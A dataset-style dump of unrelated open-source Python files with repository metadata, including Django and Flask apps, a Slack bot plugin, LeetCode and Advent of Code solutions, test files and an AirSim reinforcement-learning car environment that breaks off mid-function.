# workers = [Worker.remote(ps, n, zero) for n in range(FLAGS.num_nodes)]
workers = createWorkers(FLAGS.num_nodes, ps, zero)
global numLoops
numLoops = (int)(numLoops / FLAGS.num_nodes)
if FLAGS.sync:
print("SYNC mode")
for _ in range(numLoops):
ray.get([w.computeOneCycle.remote() for w in workers])
elif FLAGS.serial:
print("SERIAL mode")
_ = ray.get(workers[0].go.remote(numLoops, independent=True))
else:
print("ASYNC mode")
_ = ray.get([w.go.remote(numLoops, independent=False) for w in workers])
if __name__ == '__main__':
tf.app.run()
| [
"noreply@github.com"
] | zdpau.noreply@github.com |
c0c5bf3b9e293f9e815bdb6e73677906bd3d0e31 | fad2c9d62fbc48230af447c980e641626c86c1d5 | /users/apps.py | 1231bc80c02815a3287789710efca12d72d86056 | [] | no_license | marcoapr/django-lab | 65a50d9736d52fddcf84cdf47c3b84f918e5b1d7 | 35856afa988ac619643919b50a11d8de2bfba856 | refs/heads/master | 2020-04-02T20:06:57.508267 | 2018-10-26T01:22:54 | 2018-10-26T01:22:54 | 154,758,517 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 173 | py | """ User app configuration. """
from django.apps import AppConfig
class UsersConfig(AppConfig):
""" User app config """
name = 'users'
verbose_name = 'Users'
| [
"mperez@unitedvirtualities.com"
] | mperez@unitedvirtualities.com |
3e2e4ac2bfe11f943d6d864dc62bf236447cab5b | b8800f65c2955768b58c7d7fbd89647a644daed6 | /blog/models.py | b1d723e885fb9838448eac3c9471705c1f03e512 | [] | no_license | revianblue/my-first-blog | 791ae3db3f788a337c3db0986f11930eeff77e26 | a06af2e7f344e2e54be0ff677bfe403a721fea7e | refs/heads/master | 2021-01-20T01:04:46.380012 | 2017-04-24T13:38:10 | 2017-04-24T13:38:10 | 89,220,972 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 464 | py | from django.db import models
from django.utils import timezone
class Post(models.Model):
yazar = models.ForeignKey('auth.User')
baslik = models.CharField(max_length=200)
yazi = models.TextField()
yaratilma_tarihi = models.DateTimeField(default=timezone.now)
yayinlanma_tarihi = models.DateTimeField(blank=True, null=True)
def yayinla(self):
self.yayinlanma_tarihi = timezone.now()
self.save
def __str__(self):
return self.baslik
| [
"araserbilgin@gmail.com"
] | araserbilgin@gmail.com |
48489ccc71bb088f7c28deb51e9c47dcd3617c1c | 43226c0909e4164c4f69f1e462e6d089100131ee | /leap year yes or no.py | d610078f8b940c1822590c71a8c7421509a33a61 | [] | no_license | subashbabu97/leapyear | 8bf9e0449b65305c423350c5117d744304bee68b | 5cf9440abd8468f469dcf6fe30b43f54df84f92c | refs/heads/master | 2020-05-31T22:55:34.982996 | 2019-06-06T06:51:11 | 2019-06-06T06:51:11 | 190,529,094 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 95 | py | a=int(input("Input:"))
b=a%4
if b==0:
print("Output:yes")
else:
print("Output:no")
| [
"noreply@github.com"
] | subashbabu97.noreply@github.com |
291145b4c5ed899fc48d811be2dd62caa2b32b4a | 62e58c051128baef9452e7e0eb0b5a83367add26 | /x12/4010/819004010.py | 23f27f88966ad294e1ec85c55e27af7395e422d6 | [] | no_license | dougvanhorn/bots-grammars | 2eb6c0a6b5231c14a6faf194b932aa614809076c | 09db18d9d9bd9d92cefbf00f1c0de1c590fe3d0d | refs/heads/master | 2021-05-16T12:55:58.022904 | 2019-05-17T15:22:23 | 2019-05-17T15:22:23 | 105,274,633 | 0 | 0 | null | 2017-09-29T13:21:21 | 2017-09-29T13:21:21 | null | UTF-8 | Python | false | false | 1,730 | py | from bots.botsconfig import *
from records004010 import recorddefs
syntax = {
'version' : '00403', #version of ISA to send
'functionalgroup' : 'JB',
}
structure = [
{ID: 'ST', MIN: 1, MAX: 1, LEVEL: [
{ID: 'BOS', MIN: 1, MAX: 1},
{ID: 'CUR', MIN: 0, MAX: 1},
{ID: 'ITD', MIN: 0, MAX: 5},
{ID: 'N1', MIN: 0, MAX: 10, LEVEL: [
{ID: 'N2', MIN: 0, MAX: 2},
{ID: 'N3', MIN: 0, MAX: 2},
{ID: 'N4', MIN: 0, MAX: 1},
{ID: 'REF', MIN: 0, MAX: 12},
{ID: 'MSG', MIN: 0, MAX: 12},
{ID: 'PER', MIN: 0, MAX: 3},
]},
{ID: 'JIL', MIN: 1, MAX: 10000, LEVEL: [
{ID: 'PID', MIN: 0, MAX: 99999},
{ID: 'REF', MIN: 0, MAX: 12},
{ID: 'MSG', MIN: 0, MAX: 12},
{ID: 'MEA', MIN: 0, MAX: 10},
{ID: 'ITA', MIN: 0, MAX: 10},
{ID: 'PSA', MIN: 0, MAX: 1},
{ID: 'DTM', MIN: 0, MAX: 1},
{ID: 'JID', MIN: 0, MAX: 1000, LEVEL: [
{ID: 'PID', MIN: 0, MAX: 99999},
{ID: 'DTM', MIN: 0, MAX: 10},
{ID: 'REF', MIN: 0, MAX: 12},
{ID: 'MSG', MIN: 0, MAX: 12},
{ID: 'MEA', MIN: 0, MAX: 5},
]},
]},
{ID: 'AMT', MIN: 1, MAX: 1},
{ID: 'QTY', MIN: 0, MAX: 5},
{ID: 'TDS', MIN: 0, MAX: 1},
{ID: 'PSA', MIN: 0, MAX: 1000, LEVEL: [
{ID: 'N1', MIN: 0, MAX: 1},
{ID: 'N2', MIN: 0, MAX: 2},
{ID: 'N3', MIN: 0, MAX: 2},
{ID: 'N4', MIN: 0, MAX: 1},
{ID: 'DTM', MIN: 0, MAX: 1},
{ID: 'REF', MIN: 0, MAX: 12},
{ID: 'PER', MIN: 0, MAX: 3},
]},
{ID: 'CTT', MIN: 1, MAX: 1},
{ID: 'SE', MIN: 1, MAX: 1},
]}
]
| [
"jason.capriotti@gmail.com"
] | jason.capriotti@gmail.com |
51086a37acacb82ec4da2e56fe316b05793a58d1 | 2335e7d1c10d800abb10b4432465f29a4456548d | /setup.py | 721f1b8d75682c30d9183bd741ff5d826e50db7d | [
"LicenseRef-scancode-warranty-disclaimer",
"EFL-2.0"
] | permissive | deathbybandaid/Sopel-StartupMonologue | 48a7e85ca117c630cf8039af76a0bbaea91ff5a1 | f495344cee379e66ec5022e1e7edf15f075c758c | refs/heads/master | 2020-05-09T11:18:01.564022 | 2019-04-27T14:12:38 | 2019-04-27T14:12:38 | 181,074,314 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,434 | py | # -*- coding: utf-8 -*-
from __future__ import print_function
import os
import sys
from setuptools import setup, find_packages
if __name__ == '__main__':
print('Sopel does not correctly load modules installed with setup.py '
'directly. Please use "pip install .", or add {}/sopel_modules to '
'core.extra in your config.'.format(
os.path.dirname(os.path.abspath(__file__))),
file=sys.stderr)
with open('README.md') as readme_file:
readme = readme_file.read()
with open('NEWS') as history_file:
history = history_file.read()
with open('requirements.txt') as requirements_file:
requirements = [req for req in requirements_file.readlines()]
with open('dev-requirements.txt') as dev_requirements_file:
dev_requirements = [req for req in dev_requirements_file.readlines()]
setup(
name='sopel_modules.startupmonologue',
version='0.1.0',
description='Sopel Startup Monologue displays to all channels that the bot is online',
long_description=readme + '\n\n' + history,
author='Sam Zick',
author_email='sam@deathbybandaid.net',
url='https://github.com/deathbybandaid/Sopel-StartupMonologue',
packages=find_packages('.'),
namespace_packages=['sopel_modules'],
include_package_data=True,
install_requires=requirements,
tests_require=dev_requirements,
test_suite='tests',
license='Eiffel Forum License, version 2',
)
| [
"sam@deathbybandaid.net"
] | sam@deathbybandaid.net |
9f0e3f8373e8127285738a76f06d09c19699634c | 7a3dec909e1a36622c66a743968a631644a1e830 | /src/uploaders/tests/test_xml_uploader.py | 2609bba6e75a537948f5c989832786ccf1820c27 | [
"MIT"
] | permissive | fares-data-build-tool/fdbt-reference-data-service | c8388e2f7912e3ef678968efb876935d3aa438e3 | d60506edf24c723a7d56a7ff7b6586f1c1e9989d | refs/heads/develop | 2021-07-19T13:26:33.707021 | 2021-04-22T15:10:02 | 2021-04-22T15:10:02 | 247,682,844 | 2 | 0 | MIT | 2021-04-28T10:56:41 | 2020-03-16T11:16:35 | Python | UTF-8 | Python | false | false | 3,533 | py | import os
from unittest.mock import patch, MagicMock
import boto3
from txc_uploader.txc_processor import download_from_s3_and_write_to_db, extract_data_for_txc_operator_service_table, collect_journey_pattern_section_refs_and_info, collect_journey_patterns, iterate_through_journey_patterns_and_run_insert_queries
from tests.helpers import test_xml_helpers
from tests.helpers.test_data import test_data
mock_data_dict = test_xml_helpers.generate_mock_data_dict()
class TestDatabaseInsertQuerying:
@patch('txc_uploader.txc_processor.insert_into_txc_journey_pattern_link_table')
@patch('txc_uploader.txc_processor.insert_into_txc_journey_pattern_table')
def test_insert_methods_are_called_correct_number_of_times(self, mock_jp_insert, mock_jpl_insert):
service = mock_data_dict['TransXChange']['Services']['Service']
mock_journey_patterns = collect_journey_patterns(
mock_data_dict, service)
mock_jp_insert.side_effect = [
9, 27, 13, 1, 11, 5, 28, 12, 10, 6, 13, 27, 4]
mock_cursor = MagicMock()
mock_op_service_id = 12
iterate_through_journey_patterns_and_run_insert_queries(
mock_cursor, mock_data_dict, mock_op_service_id, service)
assert mock_jp_insert.call_count == len(mock_journey_patterns)
assert mock_jpl_insert.call_count == len(mock_journey_patterns)
class TestDataCollectionFunctionality:
def test_extract_data_for_txc_operator_service_table(self):
expected_operator_and_service_info = (
'ANWE', '2018-01-28', 'ANW', 'Macclesfield - Upton Priory Circular', 'NW_01_ANW_4_1', 'Macclesfield', 'Macclesfield')
operator = mock_data_dict['TransXChange']['Operators']['Operator']
service = mock_data_dict['TransXChange']['Services']['Service']
assert extract_data_for_txc_operator_service_table(
operator, service) == expected_operator_and_service_info
def test_collect_journey_pattern_section_refs_and_info(self):
mock_raw_journey_patterns = mock_data_dict['TransXChange'][
'Services']['Service']['StandardService']['JourneyPattern']
assert collect_journey_pattern_section_refs_and_info(
mock_raw_journey_patterns) == test_data.expected_list_of_journey_pattern_section_refs
def test_collect_journey_patterns(self):
service = mock_data_dict['TransXChange']['Services']['Service']
assert collect_journey_patterns(
mock_data_dict, service) == test_data.expected_list_of_journey_patterns
class TestMainFunctionality:
@patch('txc_uploader.txc_processor.write_to_database')
def test_integration_between_s3_download_and_database_write_functionality(self, db_patch, s3, cloudwatch):
dir_path = os.path.dirname(os.path.realpath(__file__))
mock_file_dir = dir_path + '/helpers/test_data/mock_txc.xml'
mock_bucket = 'test-bucket'
mock_key = 'tnds/WM/test-key'
db_connection = MagicMock()
logger = MagicMock()
conn = boto3.resource('s3', region_name='eu-west-2')
# pylint: disable=no-member
conn.create_bucket(Bucket=mock_bucket)
s3.put_object(Bucket=mock_bucket, Key=mock_key,
Body=open(mock_file_dir, 'rb'))
download_from_s3_and_write_to_db(
s3, cloudwatch, mock_bucket, mock_key, mock_file_dir, db_connection, logger)
db_patch.assert_called_once_with(
mock_data_dict, 'WM', 'tnds', mock_key, db_connection, logger, cloudwatch)
| [
"noreply@github.com"
] | fares-data-build-tool.noreply@github.com |
5cb33ac9f43d4cdcb1e19f70d4624b4fa4b74cb0 | 6a7cf44a3cdce674bd0659f81f830826caac34e1 | /Lessons/lol.py | 0c454d9399717a381f486f94fb7b1c9387163d25 | [] | no_license | Ethansu/Random-Python | 9f1b6198968091cd3f356ad2962d0efdc455c76a | 4b1b18e1cb6c04f1195082c5d0899f476e234a55 | refs/heads/master | 2021-05-06T02:10:18.163866 | 2017-12-17T00:53:14 | 2017-12-17T00:53:14 | 114,498,985 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 79 | py | #import unittest
#from homework_6 import Car
def lol(x):
return (x + 1) / 4 | [
"jingchunsumacc@gmail.com"
] | jingchunsumacc@gmail.com |
e134d1f0bece4a5e209fd10eaedcb6493c8f17b2 | e67b0c01d7244f1c635d7c2e12157076bcd2efbc | /finalproject/app.py | c4341f5d265bdc737da29944cf08361513cc42c2 | [] | no_license | SonjaGrusche/LPTHW | 0a7de74101db1b0ae62ffc35d4fac990c894ae14 | 12483e97373c9e0aa9e8785b20bb34e1e5b4b36a | refs/heads/master | 2021-01-12T15:52:06.404665 | 2017-03-21T10:27:53 | 2017-03-21T10:27:53 | 71,830,953 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,293 | py | from flask import Flask, session, request
from flask import url_for, redirect, render_template
from random import randint
import resources
app = Flask(__name__)
@app.route('/', methods=['GET'])
def start_get():
return render_template('start.html')
@app.route('/questionnaire', methods=['GET'])
def questionnaire_get():
return render_template('questionnaire.html', questions=resources.questions)
@app.route('/questionnaire', methods=['POST'])
def questionnaire_post():
totals = 0
for i in range(1, 11):
try:
totals += int(request.form.get('question' + str(i)))
except TypeError:
return render_template('questionnaire.html', questions=resources.questions, error=1)
return redirect(url_for('result', total=totals+20))
@app.route('/result/<int:total>')
def result(total):
if total in range(0, 10):
type = 0
elif total in range(10, 20):
type = 1
elif total in range(20, 26):
type = 2
elif total in range(26, 30):
type = 3
elif total in range(30, 33):
type = 4
website = resources.links[type][randint(0, len(resources.links[type])-1)]
return render_template('results.html', site=website)
app.secret_key = '1234supersecret'
if __name__ == "__main__":
app.run()
| [
"sonja.grusche@stud.leuphana.de"
] | sonja.grusche@stud.leuphana.de |
10515479aab3316ae2f634ef92fdf2aed4b5593f | 464be1d96c23380f2f4d646490928c5995d199c2 | /leet/l36.py | 431afc4e7274d4fc3a944ab25cc23ffd50b5292a | [] | no_license | TatsuLee/pythonPractice | 4c8d83fabd01b36b480c8ef1b9ff656a8d09b026 | 628c536007d131ff91f2057d863c029b2efb1bb1 | refs/heads/master | 2021-07-24T16:46:53.914031 | 2017-10-28T10:21:28 | 2017-10-28T10:21:28 | 68,804,117 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 890 | py | class Solution(object):
def isValidSudoku(self, board):
"""
:type board: List[List[str]]
:rtype: bool
"""
# generate 3 empty list to store scaned nums
row = [set() for i in range(9)]
col = [set() for i in range(9)]
grid = [set() for i in range(9)]
for i in range(9):
for j in range(9):
curDigit = board[i][j]
if curDigit == '.':
continue
if curDigit in row[i]:
return False
if curDigit in col[j]:
return False
k = i/3*3+j/3 # find the grid num with (i,j)
if curDigit in grid[k]:
return False
grid[k].add(curDigit)
row[i].add(curDigit)
col[j].add(curDigit)
return True
| [
"dli37@hawk.iit.edu"
] | dli37@hawk.iit.edu |
364d6a8b4e45dedb56ee9f02ada48d814d3f2292 | 4ccc8d6e163b156e06a5c107a6a28681184a8a03 | /2021/day_05.py | 7f2b6f57581f3a8cc0b6db5b969eb1f474bb5c19 | [] | no_license | mmercedes/adventofcode | 798925a2b8403948c16d68b9e195c148d0a69b8a | 306cffadafb48863277295cf9ed56e95699d92e6 | refs/heads/master | 2022-01-01T09:25:38.974142 | 2021-12-14T18:33:07 | 2021-12-14T18:33:07 | 159,980,279 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,313 | py | #!/usr/bin/env python
import re
def lookup_insert(m, x, y):
if x not in m:
m[x] = {}
if y not in m[x]:
m[x][y] = 0
m[x][y] = m[x][y]+1
def insert_line(m, x1, y1, x2, y2):
dx = 1 if (x1 < x2) else -1
dy = 1 if (y1 < y2) else -1
i, j = (x1, y1)
lookup_insert(m, x2, y2)
while ((i != x2) or (j != y2)):
lookup_insert(m, i, j)
if (i != x2): i += dx
if (j != y2): j += dy
def day5():
p1_lookup = {}
p2_lookup = {}
with open("./inputs/input_05.txt") as f:
for line in f:
m = re.match(r"(?P<x1>[0-9]+),(?P<y1>[0-9]+) -> (?P<x2>[0-9]+),(?P<y2>[0-9]+)", line).groupdict()
x1, y1, x2, y2 = (int(m['x1']), int(m['y1']), int(m['x2']), int(m['y2']))
if (x1 == x2) or (y1 == y2):
insert_line(p1_lookup, x1, y1, x2, y2)
insert_line(p2_lookup, x1, y1, x2, y2)
p1_ans = 0
for x in p1_lookup:
for y in p1_lookup[x]:
if p1_lookup[x][y] > 1:
p1_ans += 1
p2_ans = 0
for x in p2_lookup:
for y in p2_lookup[x]:
if p2_lookup[x][y] > 1:
p2_ans += 1
print("p1 ans: %i" % p1_ans)
print("p2 ans: %i" % p2_ans)
day5()
| [
"matthewmercedes@gmail.com"
] | matthewmercedes@gmail.com |
8de417f20989172bfac0cbb257285314d44a4cb5 | 09d81c119fb88b73c0968e6d384898ec1a65bb36 | /lab5/lab5/settings.py | 7990e2f20bbb476fd206cc294ebb34cc91767911 | [] | no_license | n10florin/nfir1917 | 8a92f5c3c32aecdaf56114ed205edbefa8f66902 | 11aca585d9b4d3bd17cd7fe8136967c2effe4c68 | refs/heads/master | 2021-04-12T09:54:08.639211 | 2018-05-17T11:28:46 | 2018-05-17T11:28:46 | 126,162,496 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,154 | py | """
Django settings for lab5 project.
Generated by 'django-admin startproject' using Django 2.0.5.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'r3()ve1_7+x%9)(t5(%q19!=fqs9e3s$+0h#9d+$=^y2wtg-6$'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'note.apps.NoteConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'lab5.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'lab5.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
| [
"n10florin@gmail.com"
] | n10florin@gmail.com |
172e416bfd9fae185c8298b4930fcd1fbb386ef6 | 8625b3616fa4a8aaf836c26e344bb39552a13c7b | /plugins/reactionCounterPlugin.py | 475ba07ec02c9f2bc78e4c15fc71888a5890a772 | [
"MIT"
] | permissive | Avishek-Paul/SlackAssistant | 06fa2049676206833aa661487d10518c03ea9466 | 4cb41fe62526dc26381c6ca6bc420b1104a8da2f | refs/heads/master | 2023-01-08T08:41:43.910145 | 2020-11-11T01:10:05 | 2020-11-11T01:10:05 | 311,824,817 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,564 | py | import config
from slackclient import SlackClient
class reactionCounterPlugin:
def __init__(self):
self.keywords = ['!rankings', '!Rankings', '!ranking', '!Ranking', 'reactionBased']
self.client = SlackClient(config.bot_token)
self.db = config.mongoClient
def execute(self, event):
if event['type'] == 'message':
message = event.get("text", "")
if len(message.split()) > 1:
num = int(message.split()[1])
maxGiversRaw = self.db.find(sort=[('given', -1)])
maxReceiversRaw = self.db.find(sort=[('received', -1)])
mGBase = "The #{} reactor is <@{}> with {} reacts given.\n"
mRBase = "The #{} reacted is <@{}> with {} reacts received.\n"
m1 = ""
m2 = ""
for i in range(num):
try:
gItem = maxGiversRaw[i]
rItem = maxReceiversRaw[i]
m1 += mGBase.format(i+1, gItem['user_id'], gItem['given'])
m2 += mRBase.format(i+1, rItem['user_id'], rItem['received'])
except:
break
else:
maxGiverRaw = self.db.find_one(sort=[('given', -1)])
maxReceiverRaw = self.db.find_one(sort=[('received', -1)])
m1 = "The #1 reactor is <@{}> with {} reacts given.\n".format(maxGiverRaw['user_id'], maxGiverRaw['given'])
m2 = "The #1 reacted is <@{}> with {} reacts received.\n".format(maxReceiverRaw['user_id'], maxReceiverRaw['received'])
self.client.api_call("chat.postMessage", thread_ts=event['ts'], channel=event['channel'], text="```{}```".format(m1))
self.client.api_call("chat.postMessage", thread_ts=event['ts'], channel=event['channel'], text="```{}```".format(m2))
elif event['type'] == 'reaction_added': #or event['type'] == 'reaction_removed':
self.updateCounter(event, 1)
elif event['type'] == 'reaction_removed':
self.updateCounter(event, -1)
def updateCounter(self, event, val):
reaction = event['reaction']
channel = event['item']['channel']
reactor = event['user'] #react giver
reacted = event['item_user'] #react receiver
if reactor == reacted:
return
reactorRaw = self.client.api_call("users.info", user=reactor)
reactedRaw = self.client.api_call("users.info", user=reacted)
reactorReal = reactorRaw['user']['real_name']
reactorDisplay = reactorRaw['user']['profile']['display_name']
reactedReal = reactedRaw['user']['real_name']
reactedDisplay = reactedRaw['user']['profile']['display_name']
#increment the reactor
self.db.update_one({'user_id' : reactor},
{
'$set' : {'display' : reactorDisplay, 'real': reactorReal},
'$inc' : {'given' : val}
},
upsert=True)
#increments the reacted
self.db.update_one({'user_id' : reacted},
{
'$set' : {'display' : reactedDisplay, 'real': reactedReal},
'$inc' : {'received' : val}
},
upsert=True) | [
"avishek97paul@gmail.com"
] | avishek97paul@gmail.com |
8d00b1ee6bc068f204efbd23dc93e6b7be30deb3 | 36c170d204310f4e5985bd5c024a286acae36aba | /Labs/seminar/functii.py | 930df547edf5d8709c42ecbf513a6d063922f248 | [] | no_license | petrediana/Analiza-Datelor | 7cc6d1f31f6d7407e702d2cc29b9baa7ca1cda8c | 23d2282a0a662fe778aae5ec9d90e32c353bdec0 | refs/heads/master | 2020-08-04T05:52:36.700366 | 2019-12-10T08:20:54 | 2019-12-10T08:20:54 | 212,029,364 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 657 | py | import numpy as np
import pandas as pd
# trimit matricea ierarhie si cate clase vreau sa trimit
def partitie(h, k):
n = np.shape(h)[0] + 1 # numarul de instante
c = np.arange(n) # primii n clusteri
for i in range(n - k):
k1 = h[i, 0]
k2 = h[i, 1]
# se formeaza cluster n + i si trebuie sa includa toate instantele care erau in k1 si k2
c[c==k1] = n + i
c[c==k2] = n + i
#print(c)
c_transformat_categorie = pd.Categorical(c).codes # imi trasforma, imi intoarce in c_trans variabila categoriala cu cele k categorii
return ["c" + str(i + 1) for i in c_transformat_categorie] | [
"noreply@github.com"
] | petrediana.noreply@github.com |
b341b840a33dfd2e49d09afbc302f4239a84611c | b983d66bb053966d46b7ff0cc7bea4142d8fe852 | /src/states.py | ca19928ba363470c4fd331d5e211ff3a03e33dbe | [
"MIT"
] | permissive | povle/vk-engineers | d4104c39c1846bc5b4250702b0da486bc8e01645 | bff0c3ac244dffc79baeed423db5a5dc814f04b8 | refs/heads/master | 2023-07-28T06:52:36.184954 | 2021-09-07T21:15:44 | 2021-09-07T21:15:44 | 305,855,459 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 443 | py | class StateError(Exception):
pass
USER_NEW = 'user_new'
USER_INIT = 'user_init'
USER_DEFAULT = 'user_default'
ADMIN_DEFAULT = 'admin_default'
ADMIN_BROADCAST_GROUP_SELECTION = 'admin_broadcast_group_selection'
ADMIN_MESSAGE_INPUT = 'admin_message_input'
ADMIN_RECEIVER_GROUP_SELECTION = 'admin_receiver_group_selection'
ADMIN_RECEIVER_SELECTION = 'admin_receiver_selection'
ADMIN_UNREAD_GROUP_SELECTION = 'admin_unread_group_selection'
| [
"pasha@blinov.co"
] | pasha@blinov.co |
55c13d8cf177119f3b0b4ac0b18bc121cc4f8d62 | f64e31cb76909a6f7fb592ad623e0a94deec25ae | /tests/test_p1494_parallel_courses_ii.py | dbf8cbae087e98cebaed176c651d916aaa595833 | [] | no_license | weak-head/leetcode | 365d635cb985e1d154985188f6728c18cab1f877 | 9a20e1835652f5e6c33ef5c238f622e81f84ca26 | refs/heads/main | 2023-05-11T14:19:58.205709 | 2023-05-05T20:57:13 | 2023-05-05T20:57:13 | 172,853,059 | 0 | 1 | null | 2022-12-09T05:22:32 | 2019-02-27T05:58:54 | Python | UTF-8 | Python | false | false | 1,391 | py | # flake8: noqa: F403, F405
import pytest
from leetcode.p1494_parallel_courses_ii import *
solutions = [
minNumberOfSemesters,
]
test_cases = [
(
[
13,
[
[12, 8],
[2, 4],
[3, 7],
[6, 8],
[11, 8],
[9, 4],
[9, 7],
[12, 4],
[11, 4],
[6, 4],
[1, 4],
[10, 7],
[10, 4],
[1, 7],
[1, 8],
[2, 7],
[8, 4],
[10, 8],
[12, 7],
[5, 4],
[3, 4],
[11, 7],
[7, 4],
[13, 4],
[9, 8],
[13, 8],
],
9,
],
3,
),
([4, [[2, 1], [3, 1], [1, 4]], 2], 3),
([5, [[2, 1], [3, 1], [4, 1], [1, 5]], 2], 4),
([11, [], 2], 6),
([11, [], 1], 11),
([11, [], 3], 4),
([11, [], 6], 2),
([11, [], 8], 2),
([11, [], 10], 2),
([11, [], 11], 1),
([11, [], 12], 1),
]
@pytest.mark.timeout(2)
@pytest.mark.parametrize(("args", "expectation"), test_cases)
@pytest.mark.parametrize("solution", solutions)
def test_solution(args, expectation, solution):
assert solution(*args) == expectation
| [
"zinchenko@live.com"
] | zinchenko@live.com |
468a03cc09e3982d357c914a5bd468274a433c55 | d5466ac9513c4cf9addb01fd89b4220696352054 | /DRL/envs/airsim/airsimcarenv.py | eea010e1a42e301f1c07418e08f5c8fc8e98aa45 | [] | no_license | sanketh1691/Don-t-Crash | 99f6bb61f53751d227b31d84bd593945dde04e12 | 9edd845b750d450de0c21543c3a82d19a8571cbc | refs/heads/master | 2023-01-18T21:06:23.052387 | 2020-11-24T03:26:03 | 2020-11-24T03:26:03 | 315,507,066 | 1 | 0 | null | 2020-11-24T03:23:39 | 2020-11-24T03:23:38 | null | UTF-8 | Python | false | false | 4,790 | py | import logging
import math
import numpy as np
import random
import time
import gym
from gym import spaces
from gym.utils import seeding
from gym.spaces import Tuple, Box, Discrete, MultiDiscrete, Dict
from gym.spaces.box import Box
from envs.airsim.myAirSimCarClient import *
logger = logging.getLogger(__name__)
class AirSimCarEnv(gym.Env):
airsimClient = None
def __init__(self):
# left depth, center depth, right depth, steering
self.low = np.array([0.0, 0.0, 0.0, 0])
self.high = np.array([100.0, 100.0, 100.0, 21])
self.observation_space = spaces.Box(self.low, self.high)
self.action_space = spaces.Discrete(21)
self.state = (100, 100, 100, random.uniform(-1.0, 1.0))
self.episodeN = 0
self.stepN = 0
self.allLogs = { 'speed':[0] }
self._seed()
self.stallCount = 0
global airsimClient
airsimClient = myAirSimCarClient()
def _seed(self, seed=None):
self.np_random, seed = seeding.np_random(seed)
return [seed]
def computeReward(self, mode='roam'):
speed = self.car_state.speed
steer = self.steer
dSpeed = 0
if mode == 'roam' or mode == 'smooth':
# reward for speed
reward = speed/60
# penalize sharp steering, to discourage going in a circle
if abs(steer) >= 1.0 and speed > 100:
reward -= abs(steer) * 2
# penalize collision
if len(self.allLogs['speed']) > 0:
dSpeed = speed - self.allLogs['speed'][-2]
else:
dSpeed = 0
reward += dSpeed
# penalize for going in a loop forever
#reward -= abs(self.steerAverage) * 10
else:
reward = 1
# Placehoder. To be filled
if mode == 'smooth':
# also penalize on jerky motion, based on a fake G-sensor
steerLog = self.allLogs['steer']
g = abs(steerLog[-1] - steerLog[-2]) * 5
reward -= g
return [reward, dSpeed]
def _step(self, action):
assert self.action_space.contains(action), "%r (%s) invalid"%(action, type(action))
self.stepN += 1
steer = (action - 10)/5.0
time.sleep(0.1)
car_state = airsimClient.getCarState()
speed = car_state.speed
self.car_state = car_state
self.steer = steer
#gas = 0.45555
gas = gas = max(min(20,(speed-20)/-15),0)
airsimClient.setCarControls(gas, steer)
speed = car_state.speed
if speed < 0.5:
self.stallCount += 1
else:
self.stallCount = 0
if self.stallCount > 2:
done = True
else:
done = False
self.sensors = airsimClient.getSensorStates()
cdepth = self.sensors[1]
self.state = self.sensors
self.state.append(action)
self.addToLog('speed', speed)
self.addToLog('steer', steer)
steerLookback = 17
steerAverage = np.average(self.allLogs['steer'][-steerLookback:])
self.steerAverage = steerAverage
# Training using the Roaming mode
reward, dSpeed = self.computeReward('roam')
self.addToLog('reward', reward)
rewardSum = np.sum(self.allLogs['reward'])
# Terminate the episode on large cumulative amount penalties,
# since car probably got into an unexpected loop of some sort
if rewardSum < -1000:
done = True
